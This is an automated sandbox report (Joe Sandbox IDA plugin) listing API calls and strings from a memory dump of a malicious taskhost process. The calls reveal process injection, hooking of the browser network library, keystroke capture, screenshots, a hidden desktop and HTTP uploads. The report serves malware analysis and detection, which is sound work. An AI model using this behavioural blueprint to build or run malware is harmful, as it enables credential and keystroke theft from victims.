Part of subcall function 00512D01: CreateEventW.KERNEL32(00522C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 00512FCE
Part of subcall function 00512D01: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00512FE7
Part of subcall function 00512D01: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00512FF7
Part of subcall function 00512D01: CloseHandle.KERNEL32(0000000C), ref: 0051300D
Part of subcall function 00512D01: CloseHandle.KERNEL32(?), ref: 00513013
Part of subcall function 00512D01: CloseHandle.KERNEL32(?), ref: 00513016

Sleep.KERNEL32(000000FF,?,00000001), ref: 0051312B
ExitProcess.KERNEL32(00000000,00000000), ref: 0051313C
OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 00513157

Part of subcall function 00512542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 00512574
Part of subcall function 00512542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0051316D,?,00000000,?,?,00000000), ref: 005125AB
Part of subcall function 00512542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0051316D,?,00000000,?,?,00000000), ref: 005125CB
Part of subcall function 00512542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,0051316D,?,00000000), ref: 0051261A

CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00A35903,00000000,00000000,00000000), ref: 00513185
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00513198
CloseHandle.KERNEL32(?), ref: 005131A1
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 005131B5
CloseHandle.KERNEL32(00000000), ref: 005131BC

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050DF74, Relevance: 18.1, APIs: 12, Instructions: 78

APIs

DeleteObject.GDI32(00000000), ref: 0050DF87
CloseHandle.KERNEL32(00000000), ref: 0050DF97
TlsFree.KERNEL32(00000000,00000000,00522868,00000000,0050E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0050DFA2
CloseHandle.KERNEL32(00000000), ref: 0050DFB0
UnmapViewOfFile.KERNEL32(00000000,00000000,00522868,00000000,0050E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0050DFBA
CloseHandle.KERNEL32(00000000), ref: 0050DFC7
SelectObject.GDI32(00000000,00000000), ref: 0050DFE1
DeleteObject.GDI32(00000000), ref: 0050DFF2
DeleteDC.GDI32(00000000), ref: 0050DFFF
CloseHandle.KERNEL32(00000000), ref: 0050E010
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0050E01F
PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0050E038

Part of subcall function 00514DCA: CloseHandle.KERNEL32(00000000), ref: 00514DD9
Part of subcall function 00514DCA: CloseHandle.KERNEL32(00000000), ref: 00514DE2

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00514CDD, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 00514CEE
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 00514D0D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00514D19
CreateProcessAsUserW.ADVAPI32(?,00000000,0051C8F5,00000000,00000000,00000000,0051C8F5,0051C8F5,00000000,?,?,?,00000000,00000044), ref: 00514D8A
CloseHandle.KERNEL32(?), ref: 00514D9D
CloseHandle.KERNEL32(?), ref: 00514DA2
FreeLibrary.KERNEL32(?), ref: 00514DB9

Strings

userenv.dll, xrefs: 00514CE6
DestroyEnvironmentBlock, xrefs: 00514D0F
CreateEnvironmentBlock, xrefs: 00514D07

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050C103, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 44

APIs

GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,005120A9), ref: 0050C111
GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,005120A9), ref: 0050C125
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0050C132
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0050C13F
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0050C14C

Part of subcall function 0050BE3B: VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,0050C160,00522360), ref: 0050BE72

Part of subcall function 0051B58C: InitializeCriticalSection.KERNEL32(00523FE4,76C61857,0050C185,00522360), ref: 0051B5A2
Part of subcall function 0051B58C: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0051B5DE
Part of subcall function 0051B58C: GetProcAddress.KERNEL32(PR_SetError), ref: 0051B5F0
Part of subcall function 0051B58C: GetProcAddress.KERNEL32(PR_GetError), ref: 0051B602

Strings

PR_Close, xrefs: 0050C127
PR_OpenTCPSocket, xrefs: 0050C11F
PR_Read, xrefs: 0050C134
nss3.dll, xrefs: 0050C10C
PR_Write, xrefs: 0050C141

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00505C8A, Relevance: 16.6, APIs: 11, Instructions: 118

APIs

Part of subcall function 0050DCA2: GetClassNameW.USER32(005301CA,?,00000101), ref: 0050DCBD

GetWindowThreadProcessId.USER32(?,?), ref: 00505CB4
ResetEvent.KERNEL32(00000010), ref: 00505D03
PostMessageW.USER32(?,?,?,00000010), ref: 00505D26
WaitForSingleObject.KERNEL32(00000010,00000064), ref: 00505D35

Part of subcall function 00505B28: WaitForSingleObject.KERNEL32(?,00000000), ref: 00505B40
Part of subcall function 00505B28: ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 00505B9A
Part of subcall function 00505B28: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00505BD6
Part of subcall function 00505B28: TerminateProcess.KERNEL32(?,00000000), ref: 00505BE3

ResetEvent.KERNEL32(?,?,?,00000010), ref: 00505D60
PostThreadMessageW.USER32(?,?,000000FC,?), ref: 00505D70
WaitForSingleObject.KERNEL32(?,000003E8), ref: 00505D82
TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 00505DA7

Part of subcall function 00514DCA: CloseHandle.KERNEL32(00000000), ref: 00514DD9
Part of subcall function 00514DCA: CloseHandle.KERNEL32(00000000), ref: 00514DE2

IntersectRect.USER32(?,?), ref: 00505DC7
FillRect.USER32(?,?,00000006), ref: 00505DD9
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 00505DED

Part of subcall function 00517A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 00517AB5

Part of subcall function 00516B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,00512E87,?,19367401,?,00000001,8889347B,00000002), ref: 00516BA9
Part of subcall function 00516B9E: CloseHandle.KERNEL32(00000000), ref: 00516BB4

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050B5AA, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274

APIs

Part of subcall function 00517AF0: WindowFromPoint.USER32(?,?), ref: 00517B0C
Part of subcall function 00517AF0: SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 00517B3D
Part of subcall function 00517AF0: GetWindowLongW.USER32(00000000,000000F0), ref: 00517B61
Part of subcall function 00517AF0: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00517B72
Part of subcall function 00517AF0: GetWindowLongW.USER32(?,000000F0), ref: 00517B8F
Part of subcall function 00517AF0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00517B9D

GetWindowLongW.USER32(00000000,000000F0), ref: 0050B6B6
GetParent.USER32(00000000), ref: 0050B6D8
GetWindowThreadProcessId.USER32(?,00000000), ref: 0050B6FD
IsWindow.USER32(?), ref: 0050B720

Part of subcall function 0050B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0050B0B3
Part of subcall function 0050B0AD: ReleaseMutex.KERNEL32(?), ref: 0050B0E7
Part of subcall function 0050B0AD: IsWindow.USER32(?), ref: 0050B0EE
Part of subcall function 0050B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0050B108
Part of subcall function 0050B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0050B110

GetWindowInfo.USER32(00000000,?), ref: 0050B770
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 0050B8AD

Part of subcall function 0050B31C: GetAncestor.USER32(?,00000002), ref: 0050B345
Part of subcall function 0050B31C: SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 0050B370
Part of subcall function 0050B31C: PostMessageW.USER32(?,00000020,?,00000000), ref: 0050B3B2
Part of subcall function 0050B31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0050B448
Part of subcall function 0050B31C: PostMessageW.USER32(?,00000112,?,?), ref: 0050B49B
Part of subcall function 0050B31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0050B4DA

Part of subcall function 0050DCA2: GetClassNameW.USER32(005301CA,?,00000101), ref: 0050DCBD

Part of subcall function 0050B11C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0050B130
Part of subcall function 0050B11C: ReleaseMutex.KERNEL32(?), ref: 0050B14F
Part of subcall function 0050B11C: GetWindowRect.USER32(?,?), ref: 0050B15C
Part of subcall function 0050B11C: IsRectEmpty.USER32(?), ref: 0050B1E0
Part of subcall function 0050B11C: GetWindowLongW.USER32(?,000000F0), ref: 0050B1EF
Part of subcall function 0050B11C: GetParent.USER32(?), ref: 0050B205
Part of subcall function 0050B11C: MapWindowPoints.USER32(00000000,00000000), ref: 0050B20E
Part of subcall function 0050B11C: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0050B232

Strings

<, xrefs: 0050B769
@, xrefs: 0050B806
, xrefs: 0050B654

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051A6AF, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 165

APIs

Part of subcall function 0051A594: HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 0051A5F4

Part of subcall function 00511049: EnterCriticalSection.KERNEL32(00522AC8), ref: 00511064
Part of subcall function 00511049: LeaveCriticalSection.KERNEL32(00522AC8), ref: 005110E7
Part of subcall function 00511049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 005111B2
Part of subcall function 00511049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 005113EC

SetLastError.KERNEL32(00002F78), ref: 0051A6F6
HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 0051A762
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0051A77E
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0051A795
EnterCriticalSection.KERNEL32(9), ref: 0051A79D
LeaveCriticalSection.KERNEL32(9,?), ref: 0051A853

Part of subcall function 00515048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 0051506A
Part of subcall function 00515048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 0051508C
Part of subcall function 00515048: InternetCloseHandle.WININET(?), ref: 00515094

Part of subcall function 00511C3C: CreateThread.KERNEL32(00000000,00000000,Function_00011A04,?,00000000,00000000), ref: 00511C81
Part of subcall function 00511C3C: CloseHandle.KERNEL32(?), ref: 00511C9A

EnterCriticalSection.KERNEL32(9), ref: 0051A87A
LeaveCriticalSection.KERNEL32(9,?), ref: 0051A8BA

Part of subcall function 00519C3C: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,9,0051A893,?), ref: 00519CB1

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Strings

9, xrefs: 0051A797, 0051A79C, 0051A852, 0051A85B, 0051A877, 0051A8B9

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00518AE4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109

APIs

Part of subcall function 00518C40: PathCombineW.SHLWAPI(00511F45,00511F45,?), ref: 00518C5F

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00518B23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00518B4A

Part of subcall function 00518AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00518B94
Part of subcall function 00518AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00518BC1
Part of subcall function 00518AE4: Sleep.KERNEL32(00000000,?,?), ref: 00518BF1

FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00518C1F
FindClose.KERNEL32(?,?,?,?,00000000), ref: 00518C31

Strings

FsQ, xrefs: 00518BF3
FsQ, xrefs: 00518BBE

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005150A3, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 67

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00522000,8404F700,00000000), ref: 005150EB
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00515112
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 00515137
InternetCloseHandle.WININET(00000000), ref: 0051514F

Strings

HTTP/1.1, xrefs: 005150DF
POST, xrefs: 005150C9
Connection: close, xrefs: 00515103, 00515110
GET, xrefs: 005150D0, 005150E7
nS<SFS, xrefs: 00515137

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051D865, Relevance: 15.1, APIs: 10, Instructions: 92

APIs

OpenWindowStationW.USER32(?,00000000,10000000), ref: 0051D88A
CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 0051D89D
GetProcessWindowStation.USER32 ref: 0051D8AE

Part of subcall function 0051D83D: GetProcessWindowStation.USER32 ref: 0051D841
Part of subcall function 0051D83D: SetProcessWindowStation.USER32(00000000), ref: 0051D855

OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0051D8E9
CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 0051D8FD
GetCurrentThreadId.KERNEL32(?,?,?,0050731A,?,2937498D,?,00000000), ref: 0051D909
GetThreadDesktop.USER32(00000000), ref: 0051D910

Part of subcall function 0051D7F8: lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,00000000,10000000,00000000,0051D84D,00000000,?,?,?,0050731A,?,2937498D,?), ref: 0051D81D

SetThreadDesktop.USER32(00000000), ref: 0051D922
CloseDesktop.USER32(00000000), ref: 0051D934
CloseWindowStation.USER32(?), ref: 0051D94F

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051C912, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99

APIs

LoadLibraryW.KERNEL32(?), ref: 0051C929
GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,0051D2A8), ref: 0051C955
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0051D2A8,?,?), ref: 0051C96C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0051D2A8,?,?), ref: 0051C984
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0051D2A8,?,?,00000000), ref: 0051CA0D

Part of subcall function 00514A87: GetCurrentThread.KERNEL32(00000020,00000000,0051C9A1,00000000,?,?,?,?,0051C9A1,SeTcbPrivilege), ref: 00514A97
Part of subcall function 00514A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0051C9A1,SeTcbPrivilege), ref: 00514A9E
Part of subcall function 00514A87: OpenProcessToken.ADVAPI32(000000FF,00000020,0051C9A1,?,?,?,?,0051C9A1,SeTcbPrivilege), ref: 00514AB0
Part of subcall function 00514A87: LookupPrivilegeValueW.ADVAPI32(00000000,0051C9A1,?), ref: 00514AD4
Part of subcall function 00514A87: AdjustTokenPrivileges.ADVAPI32(0051C9A1,00000000,00000001,00000000,00000000,00000000), ref: 00514AE9
Part of subcall function 00514A87: GetLastError.KERNEL32 ref: 00514AF3
Part of subcall function 00514A87: CloseHandle.KERNEL32(0051C9A1), ref: 00514B02

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0051D2A8,?,?,00000000), ref: 0051C9A1

Part of subcall function 0051C8A1: EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,0051C9FB,00000000,?,?,?), ref: 0051C8C6
Part of subcall function 0051C8A1: CloseHandle.KERNEL32(?), ref: 0051C907

Strings

.exe, xrefs: 0051C93B
SeTcbPrivilege, xrefs: 0051C997

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051BD7B, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247

APIs

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

EnterCriticalSection.KERNEL32(00523FE4), ref: 0051BDB7
LeaveCriticalSection.KERNEL32(00523FE4), ref: 0051BDE5
EnterCriticalSection.KERNEL32(00523FE4), ref: 0051BE09

Part of subcall function 005114C3: InternetCrackUrlA.WININET ref: 005117AC
Part of subcall function 005114C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 005117CA
Part of subcall function 005114C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 005118E4
Part of subcall function 005114C3: EnterCriticalSection.KERNEL32(00522AC8), ref: 00511910
Part of subcall function 005114C3: LeaveCriticalSection.KERNEL32(00522AC8,?,?), ref: 0051194D

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

Part of subcall function 0051835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 005183B8

Part of subcall function 005140F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 0051410D

Part of subcall function 00513346: HeapAlloc.KERNEL32(00000008,-00000003,005136F5,?,?,00000000,005141E1,?,?,?,?,?,00514191,?,?,?), ref: 00513368
Part of subcall function 00513346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,005136F5,?,?,00000000,005141E1,?,?,?,?,?,00514191,?,?), ref: 00513379

LeaveCriticalSection.KERNEL32(00523FE4,00000000,?,00000000), ref: 0051C04C

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

LeaveCriticalSection.KERNEL32(00523FE4), ref: 0051C06B
LeaveCriticalSection.KERNEL32(00523FE4), ref: 0051C078

Strings

%x, xrefs: 0051BF11
0, xrefs: 0051BF31
Content-Length, xrefs: 0051BF55

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00509489, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156

APIs

Part of subcall function 005174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00507194,?,?,00000104,.exe,00000000), ref: 005174F4
Part of subcall function 005174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00507194,?,?,00000104), ref: 00517575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 005094EF

Part of subcall function 0050929D: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 005092D4
Part of subcall function 0050929D: StrStrIW.SHLWAPI(?,?), ref: 0050935C
Part of subcall function 0050929D: StrStrIW.SHLWAPI(?,?), ref: 0050936D
Part of subcall function 0050929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00509389
Part of subcall function 0050929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 005093A7
Part of subcall function 0050929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 005093C1

PathRemoveFileSpecW.SHLWAPI(?), ref: 0050950C
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00509582

Part of subcall function 00518AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00518B23
Part of subcall function 00518AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00518B4A
Part of subcall function 00518AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00518B94
Part of subcall function 00518AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00518BC1
Part of subcall function 00518AE4: Sleep.KERNEL32(00000000,?,?), ref: 00518BF1
Part of subcall function 00518AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00518C1F
Part of subcall function 00518AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00518C31

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 0050961F

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Strings

&, xrefs: 00509560
$, xrefs: 00509552
#, xrefs: 00509567

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051A3B1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 153

APIs

EnterCriticalSection.KERNEL32(9), ref: 0051A3C2
LeaveCriticalSection.KERNEL32(9), ref: 0051A425

Part of subcall function 0051A298: ResetEvent.KERNEL32(?), ref: 0051A2A6
Part of subcall function 0051A298: InternetSetStatusCallbackW.WININET(?,0051A24F), ref: 0051A2DB
Part of subcall function 0051A298: InternetReadFileExA.WININET ref: 0051A31B
Part of subcall function 0051A298: GetLastError.KERNEL32 ref: 0051A325
Part of subcall function 0051A298: InternetSetStatusCallbackW.WININET(?,?), ref: 0051A389

EnterCriticalSection.KERNEL32(9), ref: 0051A442
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0051A4C6

Part of subcall function 0051856B: CreateFileW.KERNEL32(00514E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00518585
Part of subcall function 0051856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 005185A8
Part of subcall function 0051856B: CloseHandle.KERNEL32(00000000), ref: 005185B5

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Part of subcall function 005154F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00515505
Part of subcall function 005154F1: GetLastError.KERNEL32 ref: 0051550F
Part of subcall function 005154F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0051552F

Part of subcall function 005114C3: InternetCrackUrlA.WININET ref: 005117AC
Part of subcall function 005114C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 005117CA
Part of subcall function 005114C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 005118E4
Part of subcall function 005114C3: EnterCriticalSection.KERNEL32(00522AC8), ref: 00511910
Part of subcall function 005114C3: LeaveCriticalSection.KERNEL32(00522AC8,?,?), ref: 0051194D

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

SetLastError.KERNEL32(00002EE4), ref: 0051A51C
LeaveCriticalSection.KERNEL32(9), ref: 0051A585

Strings

9, xrefs: 0051A3BD, 0051A420, 0051A43A, 0051A580

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051AEFC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109

APIs

TranslateMessage.USER32(?), ref: 0051B053

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

EnterCriticalSection.KERNEL32(00523FB4), ref: 0051AF36
LeaveCriticalSection.KERNEL32(00523FB4), ref: 0051AFD9

Part of subcall function 0050EA11: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 0050EA43
Part of subcall function 0050EA11: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0050EA54
Part of subcall function 0050EA11: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0050EA61
Part of subcall function 0050EA11: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0050EA6E
Part of subcall function 0050EA11: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0050EA7B
Part of subcall function 0050EA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0050EA88
Part of subcall function 0050EA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0050EA95
Part of subcall function 0050EA11: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0050EAA2
Part of subcall function 0050EA11: LoadLibraryA.KERNEL32(ole32.dll), ref: 0050EAEA
Part of subcall function 0050EA11: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0050EAF5
Part of subcall function 0050EA11: LoadLibraryA.KERNEL32(gdi32.dll), ref: 0050EB07
Part of subcall function 0050EA11: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0050EB12
Part of subcall function 0050EA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0050EB1E
Part of subcall function 0050EA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0050EB2B
Part of subcall function 0050EA11: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0050EB38
Part of subcall function 0050EA11: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0050EB45
Part of subcall function 0050EA11: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0050EB52
Part of subcall function 0050EA11: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0050EB5F
Part of subcall function 0050EA11: FreeLibrary.KERNEL32(00000000), ref: 0050EE9C
Part of subcall function 0050EA11: FreeLibrary.KERNEL32(?), ref: 0050EEA6
Part of subcall function 0050EA11: FreeLibrary.KERNEL32(00000000), ref: 0050EEB0

GetTickCount.KERNEL32(?,0000001E,000001F4), ref: 0051AF9B

Part of subcall function 005140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 005140CF

GetKeyboardState.USER32(?), ref: 0051AFF3
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0051B01B

Part of subcall function 0051AD5F: EnterCriticalSection.KERNEL32(00523FB4,?,?,?,0051B052,?), ref: 0051AD7C
Part of subcall function 0051AD5F: LeaveCriticalSection.KERNEL32(00523FB4,?,?,?,0051B052,?), ref: 0051AD9D
Part of subcall function 0051AD5F: EnterCriticalSection.KERNEL32(00523FB4,?,?,?,?,0051B052,?), ref: 0051ADAE
Part of subcall function 0051AD5F: LeaveCriticalSection.KERNEL32(00523FB4,?,?,?,0051B052,?), ref: 0051AE47

Strings

, xrefs: 0051B039

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005151FD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0051521D

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

WaitForSingleObject.KERNEL32(?,00000000), ref: 0051524B
InternetReadFile.WININET(00001000,?,00001000,?), ref: 00515267
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00515282
FlushFileBuffers.KERNEL32(00000000), ref: 005152A2

